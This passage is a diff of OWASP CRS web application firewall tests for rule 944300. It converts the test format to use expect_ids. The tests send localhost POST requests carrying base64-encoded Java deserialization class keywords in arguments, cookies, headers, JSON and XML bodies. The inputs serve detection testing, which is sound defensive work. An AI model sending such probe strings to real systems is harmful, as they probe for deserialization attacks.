desc: "Content-Type application/json arg value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"HByb3RvdHlwZWNsb25lZmFjdG9yeQ\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-253 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"HByb3RvdHlwZWNsb25lZmFjdG9yeQ\"}" + output: + log: + expect_ids: [944300] + - test_id: 253 desc: "Content-Type application/json arg name includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"HByb3RvdHlwZWNsb25lZmFjdG9yeQ\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-254 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"HByb3RvdHlwZWNsb25lZmFjdG9yeQ\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 254 desc: "Argument test includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-255 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + output: + log: + expect_ids: [944300] + - test_id: 255 desc: "Argument name includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-256 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk=test" + output: + log: + expect_ids: [944300] + - test_id: 256 desc: "Cookie test includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-257 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 257 desc: "Cookie name includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-258 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 258 desc: "Request header test includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-259 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 259 desc: "XML attribute value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-260 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 260 desc: "XML element value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-261 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + output: + log: + expect_ids: [944300] + - test_id: 261 desc: "Nested XML element value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-262 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + output: + log: + expect_ids: [944300] + - test_id: 262 desc: "Content-Type text/plain includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-263 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + output: + log: + expect_ids: [944300] + - test_id: 263 desc: "Content-Type application/json arg value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-264 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk\"}" + output: + log: + expect_ids: [944300] + - test_id: 264 desc: "Content-Type application/json arg name includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-265 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 265 desc: "Argument test includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-266 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + output: + log: + expect_ids: [944300] + - test_id: 266 desc: "Argument name includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-267 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk=test" + output: + log: + expect_ids: [944300] + - test_id: 267 desc: "Cookie test includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-268 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 268 desc: "Cookie name includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-269 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 269 desc: "Request header test includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-270 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 270 desc: "XML attribute value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-271 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 271 desc: "XML element value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-272 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + output: + log: + expect_ids: [944300] + - test_id: 272 desc: "Nested XML element value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-273 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + output: + log: + expect_ids: [944300] + - test_id: 273 desc: "Content-Type text/plain includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" - output: - log_contains: "id \"944300\"" - - test_title: 944300-274 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + output: + log: + expect_ids: [944300] + - test_id: 274 desc: "Content-Type application/json arg value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-275 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk\"}" + output: + log: + expect_ids: [944300] + - test_id: 275 desc: "Content-Type application/json arg name includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-276 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 276 desc: "Argument test includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-277 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: 